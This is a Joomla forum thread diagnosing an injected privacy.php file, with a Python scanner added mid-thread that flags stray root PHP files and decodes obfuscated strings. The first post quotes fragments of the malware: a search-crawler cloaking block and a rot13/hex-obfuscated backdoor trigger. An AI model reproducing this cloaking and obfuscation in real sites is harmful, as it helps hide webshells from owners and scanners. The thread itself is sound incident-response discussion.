Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 2:34 am
by scifivision
Is there supposed to be a privacy.php file inside the main Joomla directory? I think this may be part of an injected virus. Tech support for the server flagged some questionable files and sent them to me. And if it's infected, before you say you need to reinstall the whole site etc. and update all the plugins, yes I know and am going to do just that, but I am trying to first understand if it's infected, exactly what it means so I can recognize this in the future. I noticed my other Joomla installs didn't have the file.

Some of the code to me looks legit, but I don't know a lot about the code. This is the part I didn't know about:

Code:

<?php
// Preventing a directory listing
if(!empty($_SERVER["HTTP_USER_AGENT"])) {

I don't know what it does, so I didn't want to just delete the whole file. This code however, I'm pretty sure is bad, because you have to scroll far over to see it:

Code:

$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {
        header("HTTP/1.0 404 Not Found");exit;
    }
}

and

Code:

if (isset($_GET[str_rot13(pack("H*", "6c6268737661717667"))])) {$_F=__FILE__;$_X="

and then a huge string of numbers.

If it is infected I am going to reinstall Joomla and the plugins, but I want to make sure I have a backup in case I screw something up, and although it might be vulnerable still, I don't want to save an infected backup either. I'm running Joomla 3.9.10.

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 3:47 am
by toivo
Surely infected. The only PHP files in the main Joomla directory are index.php and configuration.php. Any other PHP file there, other than the FPA script, in case it was left behind by mistake, is assumed to be malicious, like your file privacy.php, containing str_rot13 and pack statements to obfuscate the code and hide the real purpose of the script.

It is recommended to post the results of the Forum Post Assistant (FPA) by following the instructions from https://forumpostassistant.github.io/docs/ so that you would have a chance to receive advice from experts about the configuration of the web server and the site, including the third party extensions, some of which may be obsolete or reported in the Joomla! Vulnerable Extensions List (VEL) at https://vel.joomla.org/.
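The rule in the reply above, as an added Python example that is not part of the original thread: it reports PHP files in a Joomla root other than index.php and configuration.php, and statically decodes the str_rot13(pack("H*", ...)) string from the first post without running any PHP. The function names, the User-Agent pattern and the 1000-character line threshold are assumptions; the FPA script's file name is not given in the thread, so it would be reported too.

```python
import codecs
import re
import sys
from pathlib import Path

# Per the reply above: only these PHP files belong in the Joomla root.
EXPECTED_ROOT_PHP = {"index.php", "configuration.php"}
# Assumed heuristics, modelled on the fragments quoted in the first post.
ROT13_HEX = re.compile(r'str_rot13\s*\(\s*pack\s*\(\s*"H\*"\s*,\s*"((?:[0-9a-fA-F]{2})+)"\s*\)\s*\)')
CRAWLER_CLOAK = re.compile(r'HTTP_USER_AGENT.*?404 Not Found', re.S)
LONG_LINE = 1000  # assumed threshold for code you must "scroll far over" to see
# Fragments from the first post, joined into one constructed sample.
SAMPLE = r'''<?php
if(!empty($_SERVER["HTTP_USER_AGENT"])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
    if(preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) {
        header("HTTP/1.0 404 Not Found");exit;
    }
}
if (isset($_GET[str_rot13(pack("H*", "6c6268737661717667"))])) {$_F=__FILE__;
'''

def decode_rot13_hex(hex_string):
    """Statically evaluate PHP's str_rot13(pack("H*", hex_string))."""
    return codecs.decode(bytes.fromhex(hex_string).decode("latin-1"), "rot_13")

def inspect_php(source):
    """Return human-readable findings for one PHP source string."""
    findings = []
    for match in ROT13_HEX.finditer(source):
        findings.append("rot13+hex string decodes to %r" % decode_rot13_hex(match.group(1)))
    if CRAWLER_CLOAK.search(source):
        findings.append("answers 404 based on User-Agent (hidden from crawlers)")
    longest = max((len(line) for line in source.splitlines()), default=0)
    if longest > LONG_LINE:
        findings.append("line of %d characters (code pushed off-screen)" % longest)
    return findings

def scan_joomla_root(root):
    """Map each unexpected *.php file directly inside `root` to its findings."""
    report = {}
    for path in sorted(Path(root).glob("*.php")):
        if path.name not in EXPECTED_ROOT_PHP:
            report[path.name] = inspect_php(path.read_text(errors="replace"))
    return report

if __name__ == "__main__":  # no argument: analyse the embedded sample
    result = scan_joomla_root(sys.argv[1]) if len(sys.argv) > 1 else {"SAMPLE": inspect_php(SAMPLE)}
    print("\n".join("%s: %s" % (name, found) for name, found in result.items()))
```

An unexpected file with an empty findings list, such as the essentially empty info.php mentioned later in the thread, is still reported because it does not belong in the root.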

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 4:24 am
by scifivision
Thanks, I’ll figure out how to do that. I guess info.php (essentially empty) and mysql-[removed].php should be deleted too; those oddly weren’t flagged.

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 4:51 am
by toivo
You are right, those two files must have been uploaded just to make it look legitimate and confuse the webmaster and support staff.

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 5:32 am
by scifivision
Thank you. I’m going to have them scan everything, back it up just in case and then make a new install and connect the old database etc.

Question, though: I’ve read everywhere that you should reinstall no matter what. If the virus scanner says it is clean, I take it that’s not enough? Or can you just update all the plugins? It’s just a pain if unnecessary.

Re: Do I need privacy.php and is it infected?

Posted: Wed Sep 18, 2019 6:21 am
by toivo
Unfortunately, normal virus scanners do not detect every malicious script. You should try Phil Taylor's Joomla full audit service at https://myjoomla.guru/ (no affiliation), where the first software audit is free.

Follow the advice and best practice, documented in the sticky topics of the 3.x Security forum.